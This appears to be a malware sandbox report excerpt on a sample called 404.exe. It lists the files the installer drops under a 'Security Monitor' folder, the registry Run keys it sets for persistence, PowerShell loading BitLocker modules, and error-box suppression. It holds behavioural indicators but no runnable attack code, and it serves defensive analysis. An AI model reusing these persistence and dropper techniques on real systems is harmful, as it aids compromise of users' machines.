            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpFile created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-A63B5.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpFile created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpFile created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-S45KB.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpFile created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\sqlite3.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpFile created: C:\Users\user\AppData\Local\Temp\is-NKDPA.tmp\_isetup\_iscrypt.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpFile created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-PQPA7.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpFile created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-B6QNS.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpFile created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-KK513.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpFile created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-DN3K6.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpFile created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpFile created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lame_enc.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpFile created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpFile created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\sps.exe (copy)Jump to dropped file
            Source: C:\Windows\SysWOW64\curl.exeFile created: C:\Users\user\AppData\Local\Temp\d55b5edc-beb4-4418-b1de-2b3817e31a87\404.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpFile created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-1006O.tmpJump to dropped file
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exeFile created: C:\ProgramData\Security Monitor\{WCS1080F-FD66-4650-B1B8-C8310A1CE2D3}\ffws.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpFile created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-BG5BA.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\d55b5edc-beb4-4418-b1de-2b3817e31a87\404.exeFile created: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpFile created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\ff.exe (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpFile created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-CJK34.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpFile created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-83S41.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpFile created: C:\Users\user\AppData\Local\Temp\is-NKDPA.tmp\webbrowser.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpFile created: C:\Users\user\AppData\Local\Temp\is-NKDPA.tmp\_isetup\_isdecmp.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpFile created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-RPIHK.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpFile created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\unins000.exe (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpFile created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\libeay32.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpFile created: C:\Users\user\AppData\Local\Temp\is-NKDPA.tmp\_isetup\_setup64.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpFile created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\ssleay32.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpFile created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-F1LPA.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpFile created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\WebBrowser.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpFile created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-A63B5.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpFile created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpFile created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-S45KB.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpFile created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\sqlite3.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpFile created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-PQPA7.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpFile created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-B6QNS.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpFile created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-KK513.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpFile created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-DN3K6.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpFile created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpFile created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpFile created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lame_enc.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpFile created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\sps.exe (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpFile created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-1006O.tmpJump to dropped file
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exeFile created: C:\ProgramData\Security Monitor\{WCS1080F-FD66-4650-B1B8-C8310A1CE2D3}\ffws.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpFile created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-BG5BA.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpFile created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\ff.exe (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpFile created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-CJK34.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpFile created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-83S41.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpFile created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-RPIHK.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpFile created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\unins000.exe (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpFile created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\libeay32.dll (copy)Jump to dropped file

            Boot Survival

            barindex
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run localSPMJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run localSPMJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run localSPMJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run localSPMJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run localmonJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run localmonJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run localmonJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run localmonJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run kbdsprtJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run kbdsprtJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run localSPMJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run localSPMJump to behavior

            Hooking and other Techniques for Hiding and Protection

            barindex
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
            Source: C:\Users\user\Desktop\404.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\404.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\404.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\404.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\404.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\404.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\404.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\404.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\404.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\404.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\404.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\404.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\404.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\404.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\404.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\404.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\404.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\404.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\404.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\404.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\404.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\404.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\404.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\404.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\404.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\404.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\404.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\404.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\404.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\404.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\404.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\404.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\404.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\404.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\404.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\404.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\404.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\404.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\404.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\404.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\404.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
